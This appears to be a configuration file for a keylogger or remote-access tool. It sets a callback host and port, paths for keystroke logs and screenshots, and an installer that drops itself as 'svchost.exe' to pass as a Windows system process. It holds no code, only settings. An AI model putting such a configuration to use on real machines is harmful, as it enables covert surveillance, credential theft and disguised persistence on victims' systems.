[Network]
lhost = 0.0.0.0
lport = 443
backlog = 15
rhost = 192.168.203.1
rport = 443

[Modules]
klogpath = /home/decimate/Documents/
scrnpath = /home/decimate/Pictures/

[Installer]
dropname = svchost.exe

